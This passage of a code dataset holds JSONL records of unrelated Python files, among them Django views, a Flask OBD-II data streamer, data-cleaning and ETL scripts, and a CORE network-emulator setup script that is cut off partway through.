print(x)\n\n\n","repo_name":"sanhengwangxiaoyu/EJU_Data_Project","sub_path":"03_DataAnalysis/01_code/python/CodeProjects/PythonProjects/opms/mycode/Git/ods/ods_gd_points_web.py","file_name":"ods_gd_points_web.py","file_ext":"py","file_size_in_byte":30998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71343411080","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport media\nimport fresh_tomatoes\n\n\n# Create the instance variables that will contain all the necessary properties to render movies\n\ntoy_story = media.Movie('Toy Story',\n 'A story of a boy that comes to life',\n 'http://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg'\n , 'https://www.youtube.com/watch?v=KYz2wyBy3kc')\n\navatar = media.Movie('Avatar', 'A marine on an alien planet',\n 'http://fc02.deviantart.net/fs70/f/2010/014/b/c/Avatar_by_Eggar919.jpg'\n , 'https://www.youtube.com/watch?v=cRdxXPV9GNQ')\n\nrambo = media.Movie('Rambo', 'A soldier that suffers war',\n 'http://i2.cdnds.net/13/36/618x400/rambo.jpg',\n 'https://www.youtube.com/watch?v=OI0kenxkoNg')\n\n# Add those instances to the movies list\n\nmovies = [toy_story, avatar, rambo]\n\n# Pass the movies list to the open_movies_page method, which will open the youtube url in a modal window\n\nfresh_tomatoes.open_movies_page(movies)\n","repo_name":"climboid/movie-trailer-website","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"40067029714","text":"from base64 import b64encode\nfrom django.http import HttpResponse, HttpResponseForbidden\nfrom line.utilities 
import line_bot_api\nfrom django.views.generic import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom line.utilities import parser\nfrom line.einstein_vision import Predict\nfrom line.service import logger\nfrom linebot.models import (\n    MessageEvent,\n    TextSendMessage,\n    FollowEvent\n)\n\n\nclass CallbackView(View):\n    @method_decorator(csrf_exempt)\n    def dispatch(self, request, *args, **kwargs):\n        return super().dispatch(request, *args, **kwargs)\n\n    @staticmethod\n    def events_parse(request):\n        return parser.parse(\n            request.body.decode('utf-8'),\n            request.META['HTTP_X_LINE_SIGNATURE'])\n\n    def __init__(self, **kwargs):\n        super().__init__(**kwargs)\n\n    @staticmethod\n    def get_predict_result(result_lists):\n        try:\n            result_list = result_lists[0]\n            probability = str(result_list.get('probability', ''))\n            label = result_list.get('label')\n\n            return f'{label}\\n{probability}'\n\n        except Exception as ex:\n            logger.info(ex)\n            return 'This photo could not be classified.'\n\n    @staticmethod\n    def get(_):\n        return HttpResponse()\n\n    def post(self, request):\n        try:\n            events = self.events_parse(request)\n        except Exception as ex:\n            logger.info(ex)\n            return HttpResponseForbidden()\n\n        for event in events:\n            # line_id = event.source.sender_id\n\n            if isinstance(event, FollowEvent):\n                line_bot_api.reply_message(\n                    event.reply_token,\n                    TextSendMessage(\n                        text='Try sending an image.'\n                    )\n                )\n\n            if isinstance(event, MessageEvent):\n\n                if event.message.type == 'text':\n                    line_bot_api.reply_message(\n                        event.reply_token,\n                        TextSendMessage(\n                            text='Please send an image.'\n                        )\n                    )\n\n                if event.message.type == 'image':\n                    message_content = line_bot_api.get_message_content(\n                        event.message.id)\n                    try:\n                        pr = Predict()\n                        result = pr.base64(\n                            b64encode(message_content.content))\n                        reply_text = self.get_predict_result(\n                            result.get('probabilities'))\n                        line_bot_api.reply_message(\n                            event.reply_token,\n                            TextSendMessage(\n                                text=reply_text\n                            )\n                        )\n                        # line_bot_api.push_message(\n                        #     line_id,\n                        #     TextSendMessage(\n                        #         text='Thank you.'\n                        #     )\n                        # )\n\n                    except Exception as ex:\n                        logger.info(ex)\n                        return HttpResponse()\n\n        return HttpResponse()\n","repo_name":"ShinjiroMoriya/line-einstein-vision","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"8615811176","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom hackathons.models import Sponsorship, Hackathon, Lead\nfrom companies.models import Company\nfrom contacts.models import Contact\n\n\ndef page404(request):\n    return render(request, \"404.html\", status=404)\n\n@login_required\ndef dashboard_index(request):\n    if request.user.is_authenticated and request.user.current_hackathon:\n        current_hackathon = request.user.current_hackathon\n    else:\n        messages.info(request, \"You need to select a default hackathon. This is configurable on your profile page. 
Until this is set, the most recent hackathon will be displayed.\")\n        current_hackathon = Hackathon.latest()\n    if not current_hackathon:\n        return redirect(\"hackathons:index\")\n\n    return redirect(\"dashboard:view\", h_pk=current_hackathon.pk)\n\n@login_required\ndef dashboard(request, h_pk):\n    current_hackathon = get_object_or_404(Hackathon, pk=h_pk)\n\n    sponsorships = Sponsorship.objects.filter(hackathon=current_hackathon).order_by(\"-updated_at\").select_related()\n    money_raised = 0\n    money_expected = 0\n    money_possible = 0\n\n    for sponsorship in sponsorships:\n        if sponsorship.status == Sponsorship.PAID:\n            money_raised += sponsorship.contribution\n        elif sponsorship.status == Sponsorship.CONFIRMED:\n            money_expected += sponsorship.contribution\n        elif sponsorship.status == Sponsorship.RESPONDED:\n            money_possible += sponsorship.contribution\n\n    goal = current_hackathon.fundraising_goal\n    # widths are CSS percentages for the stacked progress bar, capped so the segments never total more than 100%\n    money_raised_width = min(money_raised / goal * 100, 100)\n    money_expected_width = max(0, min(money_expected / goal * 100, 100 - money_raised_width))\n    money_possible_width = max(0, min(money_possible / goal * 100, 100 - money_raised_width - money_expected_width))\n\n    money_expected += money_raised\n    money_possible += money_expected\n    \n    sponsorship_chart = gen_sponsorship_chart(sponsorships, current_hackathon)\n\n    leads = Lead.objects.filter(sponsorship__hackathon=current_hackathon).order_by(\"-updated_at\").select_related()\n    lead_chart = gen_lead_chart(leads, current_hackathon)\n\n    your_sponsorships = Sponsorship.objects.filter(hackathon=current_hackathon, organizer_contacts=request.user)\n\n    return render(\n        request,\n        \"dashboard.html\",\n        {\n            \"current_hackathon\": current_hackathon,\n            \"sponsorships\": sponsorships[:10],\n            \"sponsorship_chart_data\": sponsorship_chart,\n            \"leads\": leads[:10],\n            \"lead_chart_data\": lead_chart,\n            \"money_raised\": money_raised,\n            \"money_expected\": money_expected,\n            \"money_possible\": money_possible,\n            \"money_raised_width\": money_raised_width,\n            \"money_expected_width\": money_expected_width,\n            \"money_possible_width\": money_possible_width,\n            \"your_sponsorships\": your_sponsorships,\n        },\n    )\n\ndef gen_lead_chart(leads, hackathon):\n    responded_count = 0\n    contacted_count = 0\n    ghosted_count = 0\n    for l in leads:\n        if l.status in [Lead.RESPONDED]:\n            responded_count += 1\n        elif l.status in [Lead.CONTACTED]:\n            contacted_count += 1\n        elif l.status in [Lead.GHOSTED]:\n            ghosted_count += 1\n\n    uncontacted_count = Contact.objects.exclude(leads__sponsorship__hackathon=hackathon).count()\n    return [\n        [\"Responded\", responded_count, \"responded\", \"green\"],\n        [\"Contacted\", contacted_count, \"contacted\", \"orange\"],\n        [\"Uncontacted\", uncontacted_count, \"uncontacted\", \"gray-dark\"],\n        [\"Ghosted\", ghosted_count, \"dead\", \"pink\"],\n    ]\n\ndef gen_sponsorship_chart(sponsorships, hackathon):\n    confirmed_count = 0\n    progress_count = 0\n    dead_count = 0\n    for sp in sponsorships:\n        if sp.status in [Sponsorship.CONFIRMED, Sponsorship.PAID]:\n            confirmed_count += 1\n        elif sp.status in [Sponsorship.CONTACTED, Sponsorship.RESPONDED]:\n            progress_count += 1\n        elif sp.status in [Sponsorship.DENIED, Sponsorship.GHOSTED]:\n            dead_count += 1\n\n    uncontacted_count = Company.objects.exclude(sponsorships__hackathon=hackathon).count()\n    return [\n        [\"Confirmed\", confirmed_count, \"confirmed\", \"green\"],\n        [\"In Progress\", progress_count, \"in_progress\", \"orange\"],\n        [\"Uncontacted\", uncontacted_count, \"uncontacted\", \"gray-dark\"],\n        [\"Dead\", dead_count, \"dead\", \"pink\"],\n    
]","repo_name":"fuseumass/hackerforce","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"82"} +{"seq_id":"18020013595","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"ai_header_generator\",\n version=\"0.2.0\",\n packages=find_packages(include=['ai_header_generator', 'ai_header_generator.*']),\n install_requires=[\n \"openai\",'argparse','configparser','jsonpickle'\n ],\n entry_points={\n \"console_scripts\": [\n \"ai-meta-generator=cmd:main\",\n ],\n },\n include_package_data=True,\n package_data={\n '': ['*.json'],\n },\n url=\"https://github.com/GSejas/ai-generated-meta\",\n author=\"Jorge Sequeira\",\n author_email=\"jsequeira03@gmail.com\",\n maintainer=\"Jorge Sequeira\",\n maintainer_email=\"jsequeira03@gmail.com\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\"\n)","repo_name":"GSejas/ai-generated-meta","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"35810099860","text":"from flask import Flask, Response\nimport obd\nfrom obd import OBD, OBDStatus, Unit, commands\nimport time, sys\n\nobd.logger.setLevel(obd.logging.DEBUG) # enables all debug information\n\napp = Flask(__name__)\nport = \"/dev/pts/1\"\n\n# Stream the data using Flask\n@app.route('/stream')\ndef stream_data():\n\n pid_mapping = {\n 'Run Time': commands.RUN_TIME,\n 'Fuel Type': commands.FUEL_TYPE,\n 'Fuel Pressure': commands.FUEL_PRESSURE,\n 'Throttle': commands.THROTTLE_POS,\n 'MAF': commands.MAF,\n 'RPM': commands.RPM,\n 'Speed': commands.SPEED,\n 'Ethanol %': commands.ETHANOL_PERCENT,\n 'Fuel Rate': commands.FUEL_RATE,\n 'Load %': commands.ENGINE_LOAD,\n 'Intake Pressure': commands.INTAKE_PRESSURE,\n 'Fuel Trim': [\n commands.SHORT_FUEL_TRIM_1,\n commands.SHORT_FUEL_TRIM_2,\n commands.SHORT_O2_TRIM_B1,\n commands.SHORT_O2_TRIM_B2,\n ]\n }\n try:\n\n # Connect to the OBD-II adapter\n connection = OBD(portstr=port, baudrate=9600, fast=False, timeout=1)\n if connection.status() == OBDStatus.NOT_CONNECTED:\n print(\"Failed to connect to the OBD-II adapter\")\n exit()\n if connection.status() == OBDStatus.CAR_CONNECTED:\n print(\"The OBD-II adapter has established a connection with the vehicle!\\nEntering execution mode...\")\n time.sleep(1) # Wait for the vehicle to respond\n except:\n print(\"Failed to connect to the OBD-II adapter\")\n exit()\n\n def generate_data():\n def run_command(connection, command):\n if connection.supports(command):\n return connection.query(command).value\n return None\n\n while True:\n try:\n # Get the data from the OBD-II adapter\n run_time = run_command(connection, pid_mapping['Run Time'])\n throttle = run_command(connection, pid_mapping['Throttle'])\n fuel_type = run_command(connection, pid_mapping['Fuel Type'])\n air_intake = run_command(connection, pid_mapping['MAF'])\n if not air_intake:\n air_intake = run_command(connection, pid_mapping['Intake Pressure'])\n rpm = run_command(connection, pid_mapping['RPM'])\n speed = run_command(connection, pid_mapping['Speed'])\n ethanol = run_command(connection, pid_mapping['Ethanol %'])\n fuel_pressure = run_command(connection, pid_mapping['Fuel Pressure'])\n\n fuel_efficiency = speed.magnitude * 1.040 / fuel_pressure.magnitude\n 
read = {\n                    'time': time.strftime(\"%H:%M:%S\", time.localtime()),\n                    'data': {\n                        'Run Time': {\n                            \"magnitude\": run_time.magnitude,\n                            \"unit\": str(run_time.units),\n                            \"string\": str(run_time)\n                        },\n                        'Fuel Type': str(fuel_type),\n                        'Throttle': {\n                            \"magnitude\": throttle.magnitude,\n                            \"unit\": str(throttle.units),\n                            \"string\": str(throttle)\n                        },\n                        'Air Intake': {\n                            \"magnitude\": air_intake.magnitude,\n                            \"unit\": str(air_intake.units),\n                            \"string\": str(air_intake)\n                        },\n                        'RPM': {\n                            \"magnitude\": rpm.magnitude,\n                            \"unit\": str(rpm.units),\n                            \"string\": str(rpm)\n                        },\n                        'Speed': {\n                            \"magnitude\": speed.magnitude,\n                            \"unit\": str(speed.units),\n                            \"string\": str(speed)\n                        },\n                        'Ethanol %': ethanol.magnitude if ethanol else 'N/A',\n                        'Fuel Efficiency': fuel_efficiency\n                    }\n                }\n                yield \"\"\n                yield str(read)\n                time.sleep(0.2) # 0.2-second sampling interval\n            except Exception as e:\n                print(e)\n                print(\"Error while reading data\")\n                return\n    return Response(generate_data(), mimetype='text/html')\n\nif __name__ == '__main__':\n    # get port to use obd protocol\n    if len(sys.argv) > 1:\n        port = sys.argv[1]\n    app.run(host='0.0.0.0')\n","repo_name":"RafaelN9/elm-data-read","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"9307162696","text":"import os\nimport time\n\nimport torch\n\nfrom argparse import ArgumentParser\nfrom src.training.models.GPT2SberAbstract import GPT2SberContext, GPT2SberSimple\nfrom definitions import SBER_MODEL_SMALL, SpecialTokens\nfrom transformers import logging\nfrom typing import Tuple\n\n\ndef generate(\n    model_dir: str,\n    tokenizer_path: str,\n    context: str,\n    max_len: int,\n    beam_size: int,\n    top_k: int,\n    top_p: float,\n    is_answer: bool,\n    sampling: bool,\n    device: torch.device = torch.device(\"cpu\"),\n) -> Tuple[str, float]:\n    if not is_answer:\n        model = GPT2SberSimple(model_dir, tokenizer_path, device)\n    else:\n        model = GPT2SberContext(model_dir, tokenizer_path, device)\n    model.eval()\n\n    start = time.time()\n    generated_text = model.generate(\n        context=context, max_length=max_len, beam_size=beam_size, sampling=sampling, top_k=top_k, top_p=top_p\n    )\n    elapsed_time = time.time() - start\n\n    return generated_text, elapsed_time\n\n\nif __name__ == \"__main__\":\n    logging.set_verbosity(0)\n    os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n\n    args = ArgumentParser()\n    args.add_argument(\"--model_dir\", required=False, type=str, default=SBER_MODEL_SMALL, help=\"Directory with hf model\")\n    args.add_argument(\n        \"--tokenizer_path\", required=False, type=str, default=SBER_MODEL_SMALL, help=\"Directory with tokenizer\"\n    )\n    args.add_argument(\"--context\", type=str, required=True, help=\"Context for generation\")\n    args.add_argument(\"--max_len\", type=int, required=False, default=100, help=\"Max length of the output in tokens\")\n    args.add_argument(\"--beam_size\", type=int, required=False, default=5, help=\"Beam width\")\n    args.add_argument(\"--gpu\", action=\"store_true\", help=\"Whether to use GPU or not\")\n    args.add_argument(\"--ans\", action=\"store_true\", help=\"Model type -- with answers or not\")\n    args.add_argument(\"--sampling\", action=\"store_true\", help=\"Generation type\")\n    args.add_argument(\"--top_k\", type=int, default=50)\n    args.add_argument(\"--top_p\", type=float, default=0.9)\n    args = args.parse_args()\n\n    device = torch.device(\"cuda\") if args.gpu else torch.device(\"cpu\")\n\n    generated_text, elapsed_time = generate(\n        
model_dir=args.model_dir,\n        tokenizer_path=args.tokenizer_path,\n        context=args.context,\n        max_len=args.max_len,\n        beam_size=args.beam_size,\n        is_answer=args.ans,\n        sampling=args.sampling,\n        device=device,\n        top_k=args.top_k,\n        top_p=args.top_p\n    )\n    print(generated_text)\n    print(f\"Elapsed time: {elapsed_time: .3f} seconds\")\n","repo_name":"Stasiche/CHGK","sub_path":"src/generation/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"82"} +{"seq_id":"27750884242","text":"f = open('all2.txt','r')\nres = open('all3.txt','w')\nhow = 1\npharmacy = []\nhowcomms = 0\nfor i in f:\n    if how%2==0:\n        if i.strip() not in pharmacy:\n            url = i.strip()\n            pharmacy.append(url)  # remember seen URLs so the duplicate check above actually skips repeats\n            res.write(f'\\n{url}')\n    else:\n        try:\n            comms = i.strip().replace(',','\\n')\n            res.write(f'{comms}')\n        except:\n            name = i.strip()\n            res.write(f'{name}')\n    how+=1\nf.close()\nres.close()","repo_name":"NemoKam/djangoRomePharmacy","sub_path":"parser/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"10992872717","text":"from django.contrib.auth.models import AbstractUser\nfrom django.db import models\n\n\nclass Account(AbstractUser):\n    username = models.CharField(max_length=50,\n                                unique=True)\n    followed_genres = models.ManyToManyField('movies.Genre',\n                                             related_name='users_following',\n                                             blank=True)\n    followed_artists = models.ManyToManyField('movies.Artist',\n                                              related_name='users_following',\n                                              blank=True)\n\n    def __str__(self):\n        return self.username\n","repo_name":"aightmunam/MovieDB","sub_path":"moviedb/users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"72418850827","text":"import wget\r\nimport os\r\nimport shutil\r\nimport zipfile\r\n\r\n\r\n\r\n# Variable definition block\r\netl_projeto_name = 'ANTAQ'\r\nzones = ['bronze', 'prata', 'ouro']\r\nano = ['2019', '2020', '2021']\r\nfile_remove = ['AcordosBilaterais', 'Carga_Conteinerizada', 'Carga_Regiao', 'TemposAtracacao']\r\nurl='http://web.antaq.gov.br/Sistemas/ArquivosAnuario/Arquivos/{}.zip'\r\nurl_meta_dados = 'http://web.antaq.gov.br/Sistemas/ArquivosAnuario/Arquivos/MetadadosMovimentacao.zip'\r\npath_parent = os.path.dirname(os.getcwd())\r\n\r\n\r\nos.chdir(path_parent)\r\nos.chdir(zones[0])\r\n\r\n\r\n# Extraction block: checks whether each item already exists; if it does, the old file is removed and replaced with a fresh download\r\nif os.path.exists('MetadadosMovimentacao.zip'):\r\n    print('The file MetadadosMovimentacao.zip will be replaced with a new one')\r\n    os.remove('MetadadosMovimentacao.zip')\r\n    wget.download(url_meta_dados)\r\nelse:\r\n    print('Download: MetadadosMovimentacao.zip')\r\n    wget.download(url_meta_dados)\r\n    print('')\r\n\r\nfor a in range(len(ano)):\r\n    if os.path.exists(f'{ano[a]}.zip'):\r\n        print(f'The file {ano[a]}.zip will be replaced with a new one')\r\n        os.remove(f'{ano[a]}.zip')\r\n        wget.download(url.format(ano[a]))\r\n        print('')\r\n    else:\r\n        print(f'Download: {ano[a]}.zip')\r\n        wget.download(url.format(ano[a]))\r\n        print('')\r\n\r\n\r\n# Copy-to-prata block: takes the items from the bronze layer and copies them to the prata (silver) zone, where all the necessary transformations will be done\r\nsrc = 
os.getcwd()\r\nos.chdir(path_parent)\r\nos.chdir(zones[1])\r\ndst = os.getcwd()\r\n\r\nfor a in range(len(ano)):\r\n    src_data = (src+'\\\\{}.zip '.format(ano[a]))\r\n    dst_data = (dst+'\\\\{}.zip '.format(ano[a]))\r\n    print('Copying {}.zip to the prata layer'.format(ano[a]))\r\n    shutil.copyfile(src_data,dst_data)\r\n    print('')\r\n\r\nsrc_md = (src+'\\\\MetadadosMovimentacao.zip')\r\ndst_md = (dst+'\\\\MetadadosMovimentacao.zip')\r\nprint('Copying MetadadosMovimentacao.zip to the prata layer')\r\nshutil.copyfile(src_md, dst_md) \r\n\r\n# Unzip block: takes the files in the prata zone and unzips them.\r\nprint('Unzipping the files in the prata layer:')\r\nwith zipfile.ZipFile(\"MetadadosMovimentacao.zip\",\"r\") as zip_ref:\r\n    zip_ref.extractall(\"MetadadosMovimentacao\")\r\n\r\nfor a in range(len(ano)):\r\n    with zipfile.ZipFile(\"{}.zip\".format(ano[a]), 'r') as zip_ref:\r\n        zip_ref.extractall(ano[a])\r\n\r\n\r\n\r\n# Cleanup block: deletes the extra files that will not be used by the DS team\r\nsavePath = os.getcwd()\r\nprint('Removing MetadadosMovimentacao.zip')\r\nos.remove(\"MetadadosMovimentacao.zip\")\r\nfor a in range(len(ano)):\r\n    os.chdir(ano[a])\r\n    for f in range(len(file_remove)):\r\n        print(\"Removing file: {}{}.txt\".format(ano[a], file_remove[f]))\r\n        os.remove(\"{}{}.txt\".format(ano[a], file_remove[f]))\r\n    os.chdir(savePath)\r\n    print(\"Removing: {}.zip\".format(ano[a]))\r\n    os.remove(\"{}.zip\".format(ano[a]))\r\n\r\n","repo_name":"jamcabral/sfiec_jam","sub_path":"__main__/00extracaofull.py","file_name":"00extracaofull.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"38062948044","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 22 13:54:02 2020\n\n@author: ravit\n\"\"\"\n\n\nimport pandas as pd\nimport os \n\n\ndf = pd.read_csv(\"glassdoor_jobs.csv\")\n\n# Salary parsing\n\ndf[\"hourly\"] = df[\"Salary Estimate\"].apply(lambda x: 1 if 'per hour' in x.lower() else 0)\ndf[\"employer_provided\"]= df[\"Salary Estimate\"].apply(lambda x: 1 if 'employer provided' in x.lower() else 0)\n\ndf = df[df[\"Salary Estimate\"] != '-1']\n\nsalary = df[\"Salary Estimate\"].apply(lambda x: x.split('(')[0])\nmin_hr_eps = salary.apply(lambda x: x.lower().replace('per hour', '').replace('employer provided salary:',''))\nmin_kd = min_hr_eps.apply(lambda x: x.lower().replace('$','').replace('k',''))\n\ndf[\"min_salary\"] = min_kd.apply(lambda x: int(x.split('-')[0]))\ndf[\"max_salary\"] = min_kd.apply(lambda x: int(x.split('-')[1]))\ndf[\"avg_salary\"] = (df.min_salary + df.max_salary)/2\n\n# Company name text only\n\ndf[\"company_name_txt\"] = df.apply(lambda x: x[\"Company Name\"] if x[\"Rating\"] < 0 else x[\"Company Name\"][:-3], axis=1)\n\n# State field\ndf[\"job_state\"] = df[\"Location\"].apply(lambda x: x.split(', ')[1])\ndf.job_state.value_counts()\n#Modifying Los Angeles value to CA\ndf[\"job_state\"] = df[\"job_state\"].apply(lambda x: x if x != 'Los Angeles' else 'CA')\n\ndf[\"hq_same_state\"] = df.apply(lambda x: 1 if x.Location == x.Headquarters else 0, axis=1)\n\n# age of company\ndf[\"age_of_company\"] = df[\"Founded\"].apply(lambda x: x if x<0 else 2020-x)\n\n# parsing of job description(python, etc..,)\ndf[\"python_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 'python' in x.lower() else 0)\ndf.python_yn.value_counts()\n\ndf[\"r_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 
'r studio' in x.lower() or 'r-studio' in x.lower() else 0)\ndf.r_yn.value_counts()\n\ndf[\"spark_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 'spark' in x.lower() else 0)\ndf.spark_yn.value_counts()\n\ndf[\"aws_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 'aws' in x.lower() else 0)\ndf.aws_yn.value_counts()\n\ndf[\"excel_yn\"] = df[\"Job Description\"].apply(lambda x: 1 if 'excel' in x.lower() else 0)\ndf.excel_yn.value_counts()\n\n#drop Unnamed(first) column\ndf.columns\ndf.drop(\"Unnamed: 0\", axis=1, inplace = True)\n\n\n#change job title to the higher hierarchy\ndef title_simplifier(title):\n if 'data scientist' in title.lower():\n return 'data scientist'\n elif 'data engineer' in title.lower():\n return 'data engineer'\n elif 'data analyst' in title.lower():\n return 'analyst'\n elif 'machine learning' in title.lower():\n return 'machine learning engineer'\n elif 'manager' in title.lower():\n return 'manager'\n elif 'director' in title.lower():\n return 'director'\n else:\n return 'na'\n \ndf[\"job_simp\"] = df['Job Title'].apply(title_simplifier)\ndf.job_simp.value_counts()\n\n#seniority data transformation\ndef seniority(title):\n if 'sr' in title.lower() or 'senior' in title.lower() or 'sr.' in title.lower() or 'lead' in title.lower() or 'principal' in title.lower():\n return 'senior'\n elif 'jr' in title.lower() or 'jr.' in title.lower():\n return 'junior'\n else:\n return 'na'\n \ndf[\"seniority\"] = df['Job Title'].apply(seniority)\ndf.seniority.value_counts()\n\n#length of job description\ndf[\"job_desc_len\"] = df[\"Job Description\"].apply(lambda x: len(x))\n \n#count of competitors\ndf[\"comp_count\"] = df[\"Competitors\"].apply(lambda x: 0 if x == '-1' else len(x.split(',')))\n\n#converting hourly wage to annual\ndf[\"min_salary\"]= df.apply(lambda x: (x.min_salary*1816)//1000 if x.hourly==1 else x.min_salary, axis =1) \ndf[\"max_salary\"]= df.apply(lambda x: (x.max_salary*1816)//1000 if x.hourly==1 else x.max_salary, axis =1) \n#df[df[\"min_salary\"]>df[\"max_salary\"]][[\"hourly\", \"min_salary\", \"max_salary\"]]\n#df[df[\"hourly\"]==1][[\"hourly\", \"min_salary\", \"max_salary\"]]\n#df.drop(\"max_salary_temp\", axis=1, inplace =True)\n\n#removing \\n from the company_txt column\n#df[df[\"company_name_txt\"].head()\ndf[\"company_name_txt\"] = df[\"company_name_txt\"].apply(lambda x: x.replace('\\n',''))\n\nfilename = 'glassdoor_jobs_data_cleaned.csv'\n\nif os.path.exists(filename):\n os.remove(filename)\ndf.to_csv(filename, index= False)\n ","repo_name":"krteja44/glassdoor_salary_prediction","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70134373387","text":"# Third party APIs \nimport logging\nimport json\nimport sys \nimport mailslurp_client\nimport os\n\nfrom mailslurp_client.rest import ApiException\n\n# Logging\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG)\n\ndef get_email_content_from_mailslurp(email_id, configuration):\n with mailslurp_client.ApiClient(configuration) as api_client:\n api_instance = mailslurp_client.EmailControllerApi(api_client)\n decode = False\n api_response = None\n try:\n api_response = api_instance.get_email_html(email_id, decode=decode)\n return api_response\n except ApiException as e:\n logging.error(\"Exception when calling EmailControllerApi->get_email_html: %s\\n\" % e)\n raise ValueError(\"Unable to 
retrieve email content with emailId = \" + email_id)\n\ndef write_to_airtable(airtable, records):\n for record in records:\n try:\n airtable.insert(record)\n except:\n logging.error(\"Unable to write record - \" + json.dumps(record))\n\n","repo_name":"arjunrao87/PRR","sub_path":"prr/haro/utils/tpa.py","file_name":"tpa.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"82"} +{"seq_id":"32682517565","text":"# required imports\nimport os\nimport numpy as np\nfrom network import Network\nfrom time import sleep\nfrom core.api.grpc import client\nfrom core.api.grpc.core_pb2 import Node, NodeType, Position, SessionState, LinkOptions, Interface\n\nraft_files = [\"tcp_logger.py\", \"crypto.py\", \"tcp_client.py\", \"network_info.csv\", \"tcp_server.py\", \"start_client_service.sh\"]\nraft_files.extend([\"start_sotaru_service.sh\", \"node.py\", \"file_logger.py\", \"logger_server_info.csv\", \"client.py\"])\nraft_files.extend([\"network.py\", \"raft.py\", \"tcp_logger_server_info.py\", \"helper.py\", \"http_server.py\", \"logger.py\"])\n\nservice_name = \"UserDefined\"\n\nstartup_node_service_cmd = \"bash start_sotaru_service.sh\"\nstartup_client_service_cmd = \"bash start_client_service.sh\"\n\ndef get_file_content(relative_path):\n dirname = os.path.dirname(__file__)\n filename = os.path.join(dirname, relative_path)\n \n f = open(filename)\n content = f.read()\n \n f.close()\n return str(content)\n\ndef configure_services(session_id, nodes, startup_cmd):\n \n for node in nodes:\n core.set_node_service(\n session_id,\n node,\n service_name,\n files = raft_files,\n directories=[],\n startup=[startup_cmd],\n validate=[],\n shutdown=[],\n )\n\n for file in raft_files:\n core.set_node_service_file(\n session_id,\n node,\n service_name,\n file,\n get_file_content(file),\n )\n\ndef shutdown_session(session_id):\n print('ending core session ' + str(session_id))\n core.stop_session(session_id)\n core.delete_session(session_id)\n\nnetwork = Network('network_info.csv')\n\n# create grpc client and connect\ncore = client.CoreGrpcClient()\ncore.connect()\n\n# kill older sessions\nresponse = core.get_sessions()\nfor session in response.sessions:\n shutdown_session(session.id)\n\n# create session and get id\nresponse = core.create_session()\nsession_id = response.session_id\n\n# change session state to configuration so that nodes get started when added\ncore.set_session_state(session_id, SessionState.CONFIGURATION)\n\n# create network\nradius = 150\ncenter = Position(x=500, y=350)\nnode_ids = []\nclient_ids = []\nfor router in network.routers:\n router_position = center\n core_router = Node(type=NodeType.DEFAULT, position=router_position, model=\"router\", name=router.name)\n response = core.add_node(session_id, core_router)\n router.set_id(response.node_id)\n\n switchs_qty = len(router.switchs)\n if switchs_qty:\n switch_rot_degree_steps = 360/switchs_qty\n for s_id, switch in enumerate(router.switchs):\n switch_rot_degree = s_id*switch_rot_degree_steps\n x = radius * np.cos(np.deg2rad(switch_rot_degree)) + center.x\n y = radius * np.sin(np.deg2rad(switch_rot_degree)) + center.y\n \n switch_position = Position(x=x, y=y)\n core_switch = Node(type=NodeType.SWITCH, position=switch_position, name=switch.name)\n response = core.add_node(session_id, core_switch)\n switch.set_id(response.node_id)\n\n nodes_qty = len(switch.nodes)\n if nodes_qty:\n node_rot_degree_steps = 90/nodes_qty\n for n_id, node in enumerate(switch.nodes):\n 
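# placement note: children are spread over a 90-degree arc centred on the parent's own angle,
                    # and each sits on a circle around its parent: x = r*cos(deg2rad(theta)) + parent.x, y = r*sin(deg2rad(theta)) + parent.y
                    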
